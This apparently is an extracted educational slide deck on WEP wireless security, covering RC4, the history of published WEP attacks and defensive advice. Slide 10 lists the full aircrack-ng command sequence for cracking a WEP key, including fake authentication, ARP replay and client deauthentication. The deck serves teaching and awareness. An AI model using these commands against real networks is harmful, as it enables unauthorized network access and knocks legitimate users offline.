Wired Equivalent Privacy (WEP) is an easily broken security algorithm for IEEE 802.11 wireless networks. Introduced as part of the original 802.11 standard ratified in September 1999, its intention was to provide data confidentiality comparable to that of a traditional wired network.
3. WEP Basics
The first encryption scheme made available for
wifi
Uses RC4 encryption algorithm
RC4 is a Symmetric Key Encryption method
Available on all access points
Typically used by home users or manufacturing
companies
4. WEP Step 1 :Generating
Keystream
IV
WEP KEY
RC4
Algorithm
(KSA + PRGA)
64 or 128 bit WEP
key
Random Keystream
8. WEP: Broken Beyond Repair
2001 The insecurity of 802.11 Mobicom,july 2001
N.Borisov
2001 Weakness in the key sechudling algorithm
of RC4,S.Fluhrer,I.Mantin,A.Shamir.Aug
2001(FMS)
2004 Korek Improve on above technique and
reduces the complexity of WEP cracking.We now
only require around 500,000 packets to break the
WEP key.
2005 Andreas Klein introduces more correlations
between the RC4 key stream and the key.
2007 PTW extend Andreas technique to further
simplify WEP cracking.Now with just around
60,000-90,000 packets it is possible to break
9. WEP CRACKING
Different Attacks using different logic
Oldest one is finding “Weak IVs” which reveals
information about the WEP key
Once you can collect a large number of weak
IVs,you can crack the WEP Key
Weak IVs are not uniformly distributed in the IV
space
A weak IV is key dependent
This is the reason why it takes some time
10. Steps To Crack WEP Using Bt5
Put Your Nic Card in Promiscuous mode
#airmon-ng start wlan0
Start sniffing for air traffic
#airodump-ng –w packetCaptured mon0
Do fake authentication attack
#aireplay-ng -1 0 –e SSID –a TargetMac –h MyMac
mon0
Run arp request replay attack
#aireplay-ng -3 –b TargetMac –h MyMac mon0
Deauthenticate to collect more arp request
response
#aireplay-ng -0 1 –a BSSID –c ClientMAC mon0
Finally now run cracking tool on captured packets
#aircrack-ng packetCaptured
11. Solutions
Always use authentication in your wireless
network
Use MAC ACL mechanism to provide level2
security.
Switch off your beacon broadcast
Use WPA because it is more secure as compared
toWEP
And last But not the least….Do not use WEP!!
12. Reference
Fluhrer, S., Mantin, I., Shamir, A.: Weaknesses in the
key scheduling algorithm of rc4. In: RC4",Proceedings
of the 4th Annual Workshop on Selected Areas of
Cryptography. (2001)
KoreK: http://www.netstumbler.org/f50/chopchopexperimental-wep-attacks-12489/. (2004)
KoreK: http://www.netstumbler.org/f18/nextgeneration-wep-attacks-12277/index3.html. (2004)
Tews, E., Weinmann, R.P., Pyshkin, A.: Breaking 104
bit wep in less than 60 seconds. CryptoePrint Archive,
Report 2007/120 (2007) http://eprint.iacr.org/.
Klein, A.: Attacks on the rc4 stream cipher. Des.
Codes Cryptography 48(3) (2008) 269-286
Vivek Ramachandran:http://www.securitytube.com/